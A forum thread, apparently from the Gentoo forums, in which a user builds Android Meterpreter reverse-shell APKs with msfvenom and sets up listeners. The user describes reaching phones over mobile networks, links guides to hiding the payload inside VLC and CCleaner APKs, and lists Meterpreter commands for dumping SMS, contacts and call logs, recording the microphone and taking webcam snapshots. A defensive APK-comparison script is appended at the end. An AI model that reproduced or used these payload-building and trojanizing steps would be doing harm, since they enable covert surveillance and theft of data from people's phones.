# [SOLVED] android metasploit

## niceflower

hello i have a question about a piece of software crafted with the metasploit framework,

it runs fine, only downside is that when the android phone goes into idle, the meterpreter seems to die, and the only way to restart it is by launching the payload icon on the android phone again.

for a free payload it does include cool features, however i can not seem to get the meterpreter consistent.

any ideas?

msfconsole:

the payload is called:

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=444 R > name.apk
```

payload is set with:

```
set PAYLOAD android/meterpreter/reverse_tcp
```

it would be nice to have a consistent connection to my phone so i can track if it gets stolen, using google maps.

i know little about who made this payload into the metasploit framework, or if anyone else knows something about it.

*edit* only way i can seem to start the meterpreter is by pressing the icon on the phone :(

the solution would be to make the .apk auto run each time after idle, or even better make it auto run 24/7

i just checked the same payload on my galaxy tab 3, and there the meterpreter stays consistent even when on idle,

so the problem is related to my Huawei p8 phone.

Last edited by niceflower on Tue Jun 27, 2017 12:29 am; edited 1 time in total

----------

## niceflower

ok i found it: about the huawei P8 instead of creating tcp:

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -o name.apk
```

*to make the payload work outside the lan network for example with 4G mobile network, just use LHOST=your external public ip, and then to start the meterpreter set LHOST=your internal boxen ip

i used http:

```
msfvenom -p android/meterpreter/reverse_http LHOST=ip LPORT=4444 -o name.apk
```

then to start msfconsole:

```
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_http
set LHOST (put ip here)
set LPORT 4444
exploit
?
```

when closing down metasploit, and restarting, there is actually no interaction needed with the android device to start a new meterpreter shell.

only downside for now is that the reverse_http payload can not take webcam snap, stream, wlan_geolocate and some other features when the telephone is on idle,

however this is not a real concern at this moment for me.

last edit*

i just noticed a wakelock option so everything is working on idle too now with the reverse_http payload on port 4444

sorry for being a bit Gentoo off-topic

----------

## niceflower

Hello !

i explored my android metasploit project, and noticed that it was possible to build the PAYLOAD into VLC.apk (video lan) and ccleaner.apk (a tool to clean up a phone)

these websites can be very useful on how to embed the compromised .apk into any existing .apk:

https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/

https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-0166901/

i can say it works and vlc is running on my huawei P8 now. these are some commands from the meterpreter shell on my Kali Rolling Live:

the wakelock command is a bit bugged, and keeping the meterpreter consistent is art.

i have tried to look into creating a service in the vlc.apk with Android Studio Linux: i am stuck on how to create the service hook at this point, to let it run 24/7.

the problem still seems to be that the meterpreter shell dies over time :(

*edit*

this proves how important it is to keep "not allow app from untrusted source" turned on in Android, because any .apk from an untrusted source can be manipulated.

```
meterpreter > ?

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information

meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.

meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/OuZRSbmh.jpeg

meterpreter > 
```

----------
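The last post's point, that an .apk from an untrusted source can be manipulated, can be checked from the defender's side by comparing a suspect APK with a copy obtained from the publisher. This is an added example, not part of the original thread; the entry names and both sample archives are constructed, and it compares ZIP entries only (it does not validate APK Signature Scheme v2/v3 blocks, which sit outside the ZIP entries).

```python
import hashlib
import io
import zipfile

# Entries whose change means code, permissions or the signer were altered.
SENSITIVE = ("AndroidManifest.xml", "classes", "META-INF/")

def entry_hashes(apk_bytes):
    """Map every ZIP entry name in the APK to the SHA-256 of its content."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return {n: hashlib.sha256(z.read(n)).hexdigest() for n in z.namelist()}

def diff_apk(reference, suspect):
    """Compare a suspect APK with a copy obtained from the publisher."""
    ref, sus = entry_hashes(reference), entry_hashes(suspect)
    report = {
        "added": sorted(set(sus) - set(ref)),
        "removed": sorted(set(ref) - set(sus)),
        "changed": sorted(n for n in ref.keys() & sus.keys() if ref[n] != sus[n]),
    }
    touched = report["added"] + report["removed"] + report["changed"]
    report["sensitive"] = sorted(n for n in touched if n.startswith(SENSITIVE))
    report["repackaged"] = bool(touched)
    return report

def make_apk(entries):
    """Build a constructed, APK-shaped ZIP in memory (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()

# Constructed sample: publisher's build vs. a re-signed copy with changed code.
ORIGINAL = make_apk({
    "AndroidManifest.xml": b"<manifest perms='INTERNET'/>",
    "classes.dex": b"dex-original",
    "res/icon.png": b"png",
    "META-INF/CERT.RSA": b"publisher-cert",
})
REPACKED = make_apk({
    "AndroidManifest.xml": b"<manifest perms='INTERNET,CAMERA,READ_SMS'/>",
    "classes.dex": b"dex-modified",
    "res/icon.png": b"png",
    "META-INF/CERT.RSA": b"other-cert",
})

if __name__ == "__main__":
    for key, value in diff_apk(ORIGINAL, REPACKED).items():
        print(f"{key}: {value}")
```

Any entry under `sensitive` in the report means the code, the requested permissions or the signing certificate differ from the publisher's build, which is reason enough not to install the file.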

